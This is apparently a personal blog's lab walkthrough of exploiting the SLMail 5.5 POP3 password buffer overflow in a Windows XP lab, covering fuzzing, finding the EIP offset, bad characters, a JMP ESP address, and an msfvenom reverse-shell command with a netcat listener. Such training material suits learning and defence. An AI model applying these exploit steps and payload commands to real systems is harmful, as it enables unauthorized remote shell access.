BUFFER OVERFLOW — Exploiting SLMail email server
The POP3 server of Seattle Lab Mail 5.5 suffers from an unauthenticated buffer overflow vulnerability when receiving a very long password. We can exploit this vulnerability in any version of Windows running the executable SLmail.exe.
STEPS TO CONDUCT A BUFFER OVERFLOW
- Spiking: A method that we use to find a vulnerable part of a program.
- Fuzing: We send a bunch of characters and see if we can break it.
- Finding the offset: If we break it we want to find out at what point we did break it. So we want to find the offset.
- Overwriting the EIP: We use the offset to overwrite the EIP, the pointer address we are talking about. If we have EIP control then we can follow the next step.
- Finding Bad Characters:
- Finding the Right Module.
- Generating ShellCode: Creating the malicious shellcode that gives us a reverse shell.
- Root!
TOOLS TO BE USED
- victim box: Windows XP
- Vulnerable software: SLmail
- Attacker machine: kali
- Debugger: Immunity Debugger
We start the service with administrative privileges.
After running service we click on the start button.
We open the Immunity debugger and attach the SLmail service running on port 110.
Reference: https://www.immunityinc.com/products/debugger/
SPIKING
SLmail by default running on port 110. So we try to connect the service with netcat.
We try to check where we can overwrite the stack of the victim with ‘A’ characters. We have to find a vulnerable part. So it looks like we can send the character in the password.
FUZZING
We send a bunch of 2700 A’s characters.
Our SLmail has been crashed. We hit a violation in the Immunity debugger.
- We sent a bunch of AAA’s, so this is going into buffer space and actually filled over.
- If we look at an EBP (base of register) 41414141 that is the HEX code for four A’s.
- If we can control EIP, we can get a malicious point. EIP is the most vital in this.
Fuzzing crashed on 2700 bytes.
Finding the offset
Command
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
We are going to get an EIP value. The program will crash and then the value in the EIP is going to come back.
We have completely overwritten everything. We crossed the ESP and we got our EIP.
EIP: 39694438
We will find a pattern offset if we did everything right. Somewhere inside the 2700 bites.
Command
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
We have an exact offset match of 2606 bytes. This information is critical now that tells us at 2606 bytes we can control the EIP.
Overwriting the EIP
The offset was at 2606 bytes. This byte right before getting to the EIP. Now we will overwrite those 4 bytes.
We are replacing what we sent before to find the offset with the shellcode. The shellcode is nothing it’ is A’s and B’s now but it is going to give malicious.
In the below code, we are sending 2606 A’s because that’s where is EIP start. So bite 2607 starts the EIP. we are sending a bunch of A’s but we want to make sure that we don’t overwrite the EIP with A’s.
REMEMBER: A’s-41 & B’s-42
If we change the B to C or D it will give 434343 or 44444. But we are taking B so it will give 42424242.
EBP: 41414141
EIP: 42424242
We sent four bytes of B’s. This means we can control the EIP now.
Finding Bad Characters
We need to know the bad or good character before creating a shellcode. We check the hex dump.
Right-click on ESP and follow dump.
We will check until we find FF. If we have missed anything we have to remove a bad character from the code.
For example - If we see 10,11 and it goes to the 13 so,12 is missing. Here 12 is a bad character.
In our case x0a is a bad character because after 09 it shows 29. So, we have to remove x0a from our code and run the code again.
Again, SLMail service is restarted and the process attached to Immunity Debugger. We run our code and find another bad character i.e. x0d. In the hex dump after 0C, it shows 0E instead of 0D. So, here x0d is a bad character.
Only two bad characters we found \x0a & \x0d.
Finding the Right Module
We have to look at any .dll or something similar that has no memory protection. Means no ASLR, no Safe SEH.
We have to download the mona module. file: we copy mona.py and paste into C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands folder.
Reference: https://github.com/corelan/mona
we have to type the mona module in the immunity tool. If we look at the protection setting. we can see it’s false false false false True. Our main file is SLMFC.dll. We will check the process of finding.
Command
# !mona modules
NASM shell: We are trying to convert assembly language into hex code. We will use JMP ESP, this is a jump command. We will use this as a pointer. The pointer is going to jump to our malicious shellcode.
So the hex code equivalent of JMP ESP is FFE4.
Command
# !mona find -s “\xff\xe4” -m SLMFC.DLL
We look at the address 5f4a358f
Address=5F4A358F
Message= 0x5f4a358f : “\xff\xe4” | {PAGE_READONLY} [SLMFC.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v6.00.8063.0 (C:\WINDOWS\system32\SLMFC.DLL)
we have written the return address into reverse. Like 0x5F4A358F into \x8f\x35\x4a\x5f
After entering the jump code we will find ffe4 and then enter the Fn + F2 key.
It turns into blue which means we have set a breakpoint. This means we are going to overflow the buffer but if we hit this specific spot this jump code. This actually breaks the program and pause right here for further instruction from us.
we are overwriting the EIP in the exact spot we need to and then we are able to jump forward.
We make sure immunity is running and then run our python code to see the output.
Generating ShellCode
Command
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.163.128 LPORT=1234 EXITFUNC=thread -f c -a x86 -b “\x00\x0A\x0D”
payload: -p windows/shell_reverse_tcp
b) local host, attacker’s IP = LHOST = 192.168.163.128
c) local port, LPORT = 1234, where the attacker listens for a shell reverse connection
d) format = -f c, language C
e) EXITFUNC = thread, the execution of the shellcode does not shutdown smail.exe
f) bad characters = \x00\x0A\x0D
we run our immunity tool in windows and then hit our python code.
Command
# python exploit.py 192.168.163.141
Command
# rlwrap nc -lnvp 1234
We got our reverse shell.
Reference: https://www.exploit-db.com/exploits/638
Thank you for reading my blog.